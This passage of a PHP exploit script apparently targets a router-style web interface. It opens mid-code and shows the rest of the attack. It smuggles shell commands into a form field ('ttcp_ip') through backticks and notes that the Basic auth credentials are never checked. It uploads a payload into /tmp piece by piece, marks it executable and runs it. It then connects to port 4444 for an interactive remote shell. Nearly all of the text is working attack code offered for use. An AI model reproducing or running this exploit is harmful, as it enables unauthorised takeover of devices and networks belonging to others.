#!/usr/bin/php > /tmp/c0d3z"; $cmd = build_packet($host, $port, $vuln, $cmd); if(!send_packet($host, $port, $cmd)) die("fail\n"); else echo "sent!\n"; usleep(100000); } // make it usable echo "\tConfiguring... "; $config = build_packet($host, $port, $vuln, "chmod a+rwx /tmp/c0d3z"); if(!send_packet($host, $port, $config)) die("fail\n"); else echo "done!\n"; } // add in all the HTTP shit function build_packet($host, $port, $vuln, $payload) { $exploit = full_urlencode( "submit_button=&". "change_action=&". "submit_type=&". "action=&". "commit=0&". "ttcp_num=2&". "ttcp_size=2&". "ttcp_ip=-h `".$payload."`&". "StartEPI=1" ); $packet = "POST /".$vuln." HTTP/1.1\r\n". "Host: ".$host."\r\n". // this username:password is never checked ;) "Authorization: Basic ".base64_encode("admin:ThisCanBeAnything")."\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Content-Length: ".strlen($exploit)."\r\n". "\r\n". $exploit; return $packet; } function send_packet($host, $port, $packet) { $socket = fsockopen($host, $port, $errno, $errstr); if(!$socket) return false; if(!fwrite($socket, $packet)) return false; fclose($socket); return true; } echo "Testing connection to target... "; $socket = fsockopen($host, $port, $errno, $errstr, 30); if(!$socket) die("fail\n"); else echo "connected!\n"; fclose($socket); echo "Sending payload... \n"; build_payload($host, $port, $vuln, $shellcode); sleep(3); // don't rush him echo "Executing payload... "; if(!send_packet($host, $port, build_packet($host, $port, $vuln, "/tmp/c0d3z"))) die("fail\n"); else echo "done!\n"; sleep(3); // don't rush him echo "Attempting to get a shell... "; $socket = fsockopen($host, 4444, $errno, $errstr, 30); if(!$socket) die("fail\n"); else echo "connected!\n"; echo "Opening shell... \n"; while(!feof($socket)) { $cmd = readline($host."$ "); if(!empty($cmd)) readline_add_history($cmd); // there has got to be a better way to detect that we have // reached the end of the output than this, but whatever // it's late... i'm tired... and it works... fwrite($socket, $cmd.";echo xxxEOFxxx\n"); $data = ""; do { $data .= fread($socket, 1); } while(strpos($data, "xxxEOFxxx") === false && !feof($socket)); echo str_replace("xxxEOFxxx", "", $data); } ?>